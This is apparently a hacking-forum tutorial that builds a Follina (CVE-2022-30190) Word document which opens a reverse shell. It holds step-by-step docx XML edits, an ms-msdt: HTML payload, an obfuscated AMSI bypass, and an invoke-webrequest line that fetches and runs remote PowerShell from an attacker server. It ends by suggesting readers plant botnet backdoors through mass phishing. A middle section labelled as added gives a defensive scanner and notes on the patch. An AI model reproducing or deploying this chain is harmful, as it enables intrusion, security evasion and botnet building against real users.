06-08-2022, 03:38 PM
In this tutorial I will be using the GitHub PoC for CVE-2022-30190 ('Follina'), together with a working AMSI bypass, to help you build a document that opens a reverse shell on the target PC. Minimal experience is required, since you will be using my own AMSI bypass and ripping a reverse-shell one-liner from online.
(Steps adapted from https://github.com/JMousqueton/PoC-CVE-2022-30190).
Reverse shells are great for initial access. The shell this chain opens runs inside the same PowerShell process in which AMSI was disabled, so you can load further PowerShell tooling into that process to try to escalate privileges and root the box, all from a single document.
Steps:
1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
Note the Id value (probably it is "rId5").
3. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id="rId5") and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall".
NOTE: The created malicious docx is almost the same as the one used for CVE-2021-40444 (the MSHTML bug); only the target of the external OLE link and the HTML served from it differ.
4. Go to revshells.com.
Scroll down to PowerShell #2; in the IP field at the top enter your C2 domain or IP, and in the Port field enter your listener port.
5. Edit the generated script: remove the trailing " at the end and the leading 'powershell -nop -c " ' at the beginning. Those wrap the one-liner in a new powershell.exe process, which would break the attack chain: every PowerShell process loads AMSI when it starts, and the bypass below only disables AMSI in the process it runs in, so the reverse shell has to stay in that same process.
6. Copy the script and save it as payload.ps1
7. Create AMSI.ps1 and put the bypass in it:
$AAAAAAA = $true; $FFFFFF = $null
[Ref].Assembly.GetType([char]83+'ys'+'te'+'m.M'+'a' +[char][byte]110+'age'+'me'+'nt'+'.Au' + 'to'+'mati'+'on.'+'Ams'+'iU'+'ti'+'ls').getfield([char]97+'msi'+'In'+'itF'+'a'+'i'+'led','No'+'nPubl'+'ic,S' + 't'+'at'+'ic').'setvalue'($FFFFFF, $AAAAAAA )
8. At the bottom of AMSI.ps1, after the bypass, fetch and run the reverse-shell script. It must point at payload.ps1, not at AMSI.ps1 itself, otherwise the script just re-downloads itself in a loop:
invoke-expression(invoke-webrequest https://yourserver.com/payload.ps1)
9. Host both AMSI.ps1 and payload.ps1 on your server (Apache, python -m http.server, or any other web server).
10. Serve the ms-msdt: command in the HTML payload at http://yourserver.com/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (repeat this comment line more than 60 times: the PoC needs the HTML padded to several kilobytes or the ms-msdt navigation is not triggered)
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(IWR https://yourserver.com/AMSI.ps1))i/../.....igstub.exe \"";
</script>
</body>
</html>
11. Congratulations. Make sure you are hosting all three payloads (payload.html, AMSI.ps1 and payload.ps1) and that your listener is waiting. When the target opens the document, Word fetches payload.html, the ms-msdt: URI runs the PowerShell command that disables AMSI in that process, and with AMSI out of the way the same process pulls down and runs the PowerShell reverse-shell payload, which AMSI-based script scanning no longer sees. Note that the chain depends on the unpatched MSDT handler: Microsoft fixed CVE-2022-30190 in the June 2022 security updates, and the published workaround before the fix was to disable the ms-msdt: protocol handler (back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key); either one stops the document at step 10.
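The docx indicators from steps 1-3 (an oleObject relationship with TargetMode="External" pointing at a URL, and an <o:OLEObject> with Type="Link" and UpdateMode="OnCall" referencing it) are exactly what a defender greps for. The following is an added example and not part of the original post or the PoC: a Python scanner that unzips a .docx, parses the two XML parts, reports those indicators, and also flags any part carrying an ms-msdt: URI. The two sample documents it builds are constructed minimal skeletons, and the host name payload.example is a placeholder, not a real server.

```python
"""Added example: scan a .docx for the Follina indicators described in steps 1-3.
Not part of the original post; the sample documents below are constructed."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_NS = "urn:schemas-microsoft-com:office:office"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def inspect_docx(data: bytes) -> list:
    """Return human-readable findings for a .docx given as zip bytes; empty list means clean."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        external_ole = {}  # rId -> Target for oleObject relationships marked External
        if "word/_rels/document.xml.rels" in names:
            rels = ET.fromstring(z.read("word/_rels/document.xml.rels"))
            for rel in rels.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    external_ole[rel.get("Id")] = rel.get("Target", "")
        for rid, target in external_ole.items():
            findings.append(f"{rid}: external OLE relationship -> {target}")
            # The PoC appends '!' to the URL; strip it before checking the scheme.
            if target.rstrip("!").lower().startswith(("http://", "https://")):
                findings.append(f"{rid}: OLE target is a remote URL")
        if "word/document.xml" in names:
            doc = ET.fromstring(z.read("word/document.xml"))
            for ole in doc.iter(f"{{{OFFICE_NS}}}OLEObject"):
                rid = ole.get(f"{{{R_NS}}}id")
                if rid in external_ole and ole.get("Type") == "Link":
                    findings.append(f"{rid}: linked OLEObject, UpdateMode={ole.get('UpdateMode')}")
        # The ms-msdt: scheme normally lives in the remote HTML, but flag it if any part carries it.
        for name in sorted(names):
            if re.search(rb"ms-msdt:", z.read(name), re.IGNORECASE):
                findings.append(f"{name}: contains ms-msdt: URI")
    return findings


def is_follina_like(data: bytes) -> bool:
    """True when an External OLE relationship points at a URL and a linked OLEObject references it."""
    found = inspect_docx(data)
    return any("remote URL" in f for f in found) and any("linked OLEObject" in f for f in found)


def build_sample_docx(target: str, target_mode: str, ole_type: str) -> bytes:
    """Constructed minimal docx containing only the two parts the scanner reads (not a real Word file)."""
    mode_attr = f' TargetMode="{target_mode}"' if target_mode else ""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{target}"{mode_attr}/>'
        "</Relationships>"
    )
    update_attr = ' UpdateMode="OnCall"' if ole_type == "Link" else ""
    document = (
        f'<w:document xmlns:w="{W_NS}" xmlns:o="{OFFICE_NS}" xmlns:r="{R_NS}">'
        "<w:body><w:p><w:r><w:object>"
        f'<o:OLEObject Type="{ole_type}" ProgID="Paint.Picture" r:id="rId5"{update_attr}/>'
        "</w:object></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed samples: a normal embedded bitmap versus the step 2/3 modifications.
BENIGN_DOCX = build_sample_docx("embeddings/oleObject1.bin", "", "Embed")
FOLLINA_DOCX = build_sample_docx("http://payload.example/payload.html!", "External", "Link")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = inspect_docx(fh.read())
        print(path, "SUSPICIOUS" if hits else "clean")
        for h in hits:
            print("  -", h)
```

Run it as python follina_scan.py suspect.docx. The same relationship/OLEObject pattern also covers the CVE-2021-40444 style documents mentioned above, since both rely on an external linked OLE object; the ms-msdt: grep is there for variants that carry the URI inside the package rather than in remote HTML.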
DISCLAIMER: at the moment this is tested and works. If you have any issues it might be because a skid used my AMSI bypass. I recommend you look at my other post on obfuscation techniques, which shows how to use basic PowerShell string formatting to design your own working AMSI bypass.
NOTES: The payload is, at its root, a PowerShell Invoke-Expression command, so it will execute anything you put in the pipeline. You are not limited to downloading and running PowerShell scripts; you can call executables with arguments. For example, you can write a short PowerShell one-liner that drops a botnet backdoor on the PC, then send the document out from a phishing server to hundreds of thousands of addresses, and you have a botnet.
- The Powershell god Kabuto